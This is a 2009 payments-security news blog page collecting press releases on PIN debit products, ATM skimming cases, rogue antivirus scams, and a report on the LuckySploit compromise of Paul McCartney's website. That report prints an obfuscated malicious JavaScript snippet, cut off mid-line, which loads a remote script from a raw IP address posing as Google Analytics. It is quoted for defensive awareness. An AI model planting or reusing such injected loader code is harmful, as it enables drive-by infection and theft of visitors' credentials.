Wednesday, April 8, 2009

Acculynk Claims Consumers Like Their Solution

Editor's Note:  This came across the news wires today and in fairness, I thought I'd share it with the PIN Payments News Blog readers.  After speaking with HomeATM CEO and Chairman, Ken Mages, he asked me to remind readers what he said a couple weeks back: PIN on PED vs. PIN on the Web

"I'll make this last promise or take a lunch bet with anyone...that once software PIN goes live,
within a month, an FTP site will arise with it's user's PAN and PIN numbers.  I One-Hundred-Percent (100%) guarantee it."  - kgm - Chairman/CEO -
HomeATM ePayment Solutions

To read a White Paper comparison on "Hardware vs. Software" Security Click the Picture Above Left (PIN Debit Payment PDF) and it will open.  Here's Acculynk's Press Release:

Study Finds New Payment Software PaySecure Increases Debit Cardholder Confidence Online

Secure PIN Debit Payment Method Could Increase Online Debit Card Transactions and Lead to Additional Internet Purchases

SAN FRANCISCO--(BUSINESS WIRE)--A new Javelin Strategy & Research ( study reveals that a majority of surveyed debit cardholders feel confident about using their personal identification number (PIN) to make online purchases with PaySecure, a new Internet PIN debit payment method provided by Acculynk.

The study, commissioned by Acculynk and PULSE, evaluated debit cardholder perceptions and attitudes about PaySecure, and included 500 U.S. debit card users who purchased online in the last year. Participants used PaySecure for a mock online purchase and then answered a series of questions about their experience using the product.

According to the study, 80% of survey participants would use PaySecure when it is presented by a trusted merchant, 65% of survey participants would feel safer buying on the Internet with PaySecure, and 48% would buy more often on the Internet if they could pay with PaySecure.

“Our research shows that consumers are more willing to complete an online purchase when they feel the transaction is secure,” said James Van Dyke, Founder and President of Javelin.

“In the current economic climate, debit payment methods that increase consumers’ perceived security will be preferred by more consumers.”

Key Findings From the Custom Survey:


The study was commissioned by PaySecure provider Acculynk and PULSE and conducted by Javelin Strategy & Research. The study, conducted in March, 2009, recruited 500 U.S. adults to participate. Participants were targeted to obtain U.S. nationally representative groups based on age, gender and annual household income. To qualify for the study, participants were required to use their debit card for at least 40% of point of sale purchases and Internet purchases, and made a purchase on the Internet in the last twelve months. Participants used the PaySecure PIN-pad for a mock online purchase and then completed a survey of agree/disagree questions to question the product’s ease of use, consumer acceptance and perceived security. Agreement for an item was determined as 7 or greater on a 10 point scale.

About Javelin Strategy & Research

Javelin is the leading independent provider of quantitative and qualitative research focused exclusively on financial services topics. Based on the most rigorous statistical methodologies, Javelin conducts in-depth primary research studies to pinpoint dynamic risks and opportunities. Javelin helps its clients achieve their initiatives through three service offerings, including syndicated research subscriptions, custom research projects and strategic consulting. Javelin’s client list includes some of the largest banks, credit unions, card issuers, and technology enterprises in the financial services industry. For more information about this or other Javelin reports, please visit or call (925) 225-9100.

About Acculynk

Acculynk is a leading technology provider with a suite of software-only services that secure online transactions. Backed by a powerful encryption and authentication framework protected by a family of issued and pending patents, Acculynk’s services provide greater security, reliability, convenience and return on investment for consumers, merchants, networks, issuers and acquirers. For more information, visit


PULSE is one of the nation’s leading ATM/debit networks, currently serving more than 4,500 banks, credit unions and savings institutions across the country. PULSE is owned by Discover Financial Services (NYSE: DFS). The network links cardholders with more than 289,000 ATMs, as well as POS terminals at retail locations nationwide. The company is also a valued resource for industry research related to electronic payments and is committed to providing its participants with education on evolving products, services and trends in the payments industry. For more information, visit

Javelin Strategy & Research
Kathleen McCabe, +1-925-225-9100 ext. 15
Marketing Director


Reblog this post [with Zemanta]

82% Concerned About Private Label Prepaid Cards

Private Prepaid Cards Take Lumps From Recession: Survey - 04..2009 - U.S. Banker Article
U.S. Banker | April 2009
By Joseph Rosta

Private-label prepaid cards are losing their luster because of the recession, according to an Aite Group research note based on a survey of 21 card industry executives.

Eighty-two percent of those participating say current economic conditions are have a “somewhat to very adverse” impact on the sale of private-label cards, as expanding retailer bankruptcies stoke consumer fears they could be stuck holding worthless and unredeemable gift and other prepaid cards from defunct chain stores.

Continue Reading

ATM Skimming Victims Lose $50K (Video) | Buffalo, NY | ATM Skimming Victims Lose More Than $50,000

The United States Attorneys Office announced Tuesday it's prosecuting a Romanian man for stealing more than $50,000 through a scam known as ATM skimming.

Assistant U.S. Attorney Aaron Mango said Tiberiu Szebeni, 29, used an electronic faceplate, known as a skimmer, to steal account information from ATM customers. Typically, the device sits on top of the slot in which bank cards are inserted.

"When you put your card into the ATM, it passes through this skimming device, and the skimming device then records all of the information on your card," Mango explained.

Once the thieves have that information, all they need is your pin number. Mango said that's typically obtained through the use of a tiny, pinhole camera with a view of the keypad, but he said thieves may also utilize a high-powered, zoom camera stationed somewhere in the distance.

Mango said once Szebeni obtained both the account and pin numbers, he transferred that information to empty store gift cards. Then, by using the magnetic strip in each card, Mango said Szebeni essentially turned each one into a clone of the original ATM card.

Federal prosecutors have charged Szebeni with use of a fraudulent access device with intent to defraud. Secret Service agents arrested him at the Rainbow Bridge on March 31st after a tip from a Rochester resident led them to the Romanian citizen.

Continue Reading

Reblog this post [with Zemanta]

Paul McCartney Website LuckySploited

Source: scmagazineus:Complete item:

The official website for former Beatle Paul McCartney was compromised to infect users through drive-by downloads.

The site was attacked by the LuckySploit toolkit, according to web security firm ScanSafe, which discovered the hack. The toolkit was recently updated to include a set of HTML files that contain obfuscated and malicious JavaScript code, according to, a computer security website.

ScanSafe said in a statement that its researchers discovered the infection on Saturday, the same day McCartney reunited on stage with Ringo Starr for the first time in years. The toolkit was hidden behind an invisible frame on the site. When users visited, their machines were hit with an exploit that downloaded a rootkit.

Once the rootkit is installed "behind the scenes" on the victim's computer, thieves could steal personal information, such as credit card details and login credentials, according to ScanSafe.

"Once your computer is infected with a rootkit, none of your personal information is safe," said Spencer Parker, director of product management for ScanSafe, in a statement. "This is an extremely attractive target for cybercriminals given the level of attention McCartney is receiving at this moment.

McCartney's site quickly was fixed, according to ScanSafe. It is unclear how many users were compromised. A representative for the musician could not be reached for comment on Tuesday.


The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million dollar commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual insasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions faciliate Zeus' activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

 var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i

Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.

Source: E-Secure-IT

Reblog this post [with Zemanta]

HomeATM Press Release

With PCI PED 2.0 Certification in Hand, HomeATM Targets Funds Transfers

HomeATM Announces Strategic Partnership to Deploy 250,000 Terminals with Major Remittance Provider


PRLog (Press Release) – Apr 08, 2009 – Chicago: HomeATM ePayment Solutions, a leading provider of secure hardware and software solutions, today announced that it has signed a contract with a major remittance provider to provide 250,000 Safe-T-PIN (TM) terminals to it's customers.

The Safe-T-PIN point of sale terminal, manufactured by HomeATM, is the first ever Internet PED to achieve PCI PED 2.0 certification from the Payment Card Industry. Safe-T-PIN provides secure two factor authentication for e-commerce transactions and secure log-in.

When combined with HomeATM's proprietary electronic money transfer platform, the SafeTPIN allows consumers and businesses alike, to swipe any bank card, enter their PIN and transfer money in real-time to the recipient.

With the HomeATM Funds Transfer application, it's no longer necessary to go through the hassles of driving or walking to a money transfer location to send or receive money. It can be done in the safety of your own home in real time. HomeATM also eliminates the burden of having to preload third party cards...simply swipe your existing bank card, enter your PIN and send. The recipient swipes their bank card, enters their PIN and receives. Nothing could be more simple.

The pocket-sized Safe-T-PIN(TM) is USB "plug and play," eliminating the need for drivers or downloads. Additionally, it works with any operating system or browser. The device provides users with the added convenience of swiping their cards versus keying in their numbers and will work with any bank, card processor, and currency. The significance of this feat is that bank/military grade encryption (including 3DES and DUKPT key management) of financial data from beginning to end, is now affordable to the masses.

SourceMedia's ATM&Debit News has featured HomeATM on a front page article in their latest issue which you can access at

About HomeATM's Safe-T-PIN (tm)

The HomeATM Safe-T-PIN is the world's only PCI PED 2.0 Certified E-Commerce Device.  Employing Tripe DES Encryption and DUKPT Key Management, it provides complete end-to-end encryption protecting the users card data from beginning to end.

About HomeATM

HomeATM owns a global patent for secure Internet PIN based transactions. Leveraging our E2EE PCI 2.0 PED certified solution, a merchant or remitter can move funds from their bank account or open loop/closed loop payment card in real-time. Utilizing HomeATM's patented solution with a bank issued card alleviates the burden for merchants to address fraud issues as HomeATM leverages the issuing bank's KYC/AML (Know Your Customer/Anti-Money Laundering) protocols. No other payment solution serves Person-to-Person, Business-to-Consumer, Business-to-Business, and Mobile Payments with the speed, security and cost-effectiveness of HomeATM. HomeATM is EMV ready and already enjoys strategic relationships with Cardinal Commerce and UATP.

For further information, visit: or contact Mitchell Cobrin, COO

# # #

Reblog this post [with Zemanta]

Wolf in Sheep's Clothing - Security Software

Rogue security software now a top threat - Computer Business Review : News
Rogue security software now a top threat
Published:08-April-2009 | By Kevin White

Microsoft charts rise of malware in fake security software

(Editor's Note:  I've provided examples of Rogue Software Sites below)

Security intelligence gathered by Microsoft Corp shows a significant increase in rogue security software or ‘scareware’ that lures people into paying for protection that, unknown to them, is actually malware often designed to steal personal information.

According to the latest Microsoft Security Intelligence Report released today, rogue programmes known as Win32/FakeXPA and Win32/FakeSecSen were detected on more than 1.5 million computers.

Win32/Renos, another threat that is used to deliver rogue security software, was detected on 4.4 million unique computers, an increase of 67% percent over the first half of 2008.

Vinny Gullotto, general manager of the Microsoft Malware Protection Centre said, "We see cybercriminals increasingly going after vulnerabilities in human nature rather than software.”

He said the security industry needs combat the next generation of online threats through a community-based defence and broad industry cooperation with law enforcement and the public.

Rogue security software and other social engineering attacks compromise people's privacy and are costly; some take personal information and tap into bank accounts, while others infect computers and rob businesses of productivity.

Steps can be made to counter the problem, and the report recommends that security managers always configure computers to use Microsoft Update instead of Windows Update.

They should also use the Microsoft Security Assessment Tool (MSAT) to help assess weaknesses in their IT security environment.

Individuals are warned not to follow advertisements for unknown software that appears to provide protection and should avoid opening attachments or clicking on links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.

The report also cited the biggest cause of data breaches as lost and stolen computer equipment, which it reckons makes for 50% of all reported incidents.

PIN Payments News is Providing Warnings on the following rogue sites:  is a scam website designed to sell rogue anti-spyware programs. Upon entering the website you will be greated by a fake online system scan, which returns an exaggerated report full of non-existent infections. Afterwards the website will display some popups, which read:

    "The page at says:   Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC" or     " says:  Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs." is a malicious website, and should therefore be blocked using the HOSTS file.
is a malicious website, created for only one purpose - to sell rogue anti-spyware programs. provides a fake online system scan, which will attempt to scare the user with fake threats. Afterwards it will display a few popups with the same reason in mind. The popups read:

    "The page at says:      Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"  or      "http://WWWMobileReads com says:      Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs." is a malicious website and should therefore be blocked using the HOSTS file.


Attack of the Card Skimmers - Gizmodo

Source: Gizmodo
Complete item:

Previously on C.S.I... a man found an actual card skimmer in the wild, in the flesh. Today, Gizmodo reader Sean became the card skimmer/PIN camera's latest almost-victim. Where? Chase Bank in Manhattan, East Village.

Sean Seibel was inside a local Chase bank where he inserted his ATM card into one of two side-by-side automatic teller machines. When the machine told him it could not read his card, it took him a bit of jiggling to get his card back. He tried it a couple more times and got the same results. Before trying the other machine, he inspected the slot of the current ATM he was using and realized that it had a false plastic cover attached to the slot. The amazing thing about the cover was that the translucent green plastic matched the card reader slot perfectly, meaning that it was made specifically for Chase ATMs. After snapping a few photos with his iPhone, he alerted the branch manager and explained what happened.

As he was leaving, Seibel remembered reading about card skimmers having small cameras in the proximity in order to read PIN pad activity, so naturally, he went back to the ATM to inspect, which is where he found an extra mirror attached to the vandalized machine that the other ATMs didn't have. Drilled into the mirror was a tiny pinhole with a camera inside, directed at the PIN pad. Seibel alerted the branch manager again and asked Chase why they hadn't inspected the ATM after he had warned them the first time. Chase honestly replied that they hadn't thought of it because they had never encountered that sort of thing before.
Reblog this post [with Zemanta]

Disqus for ePayment News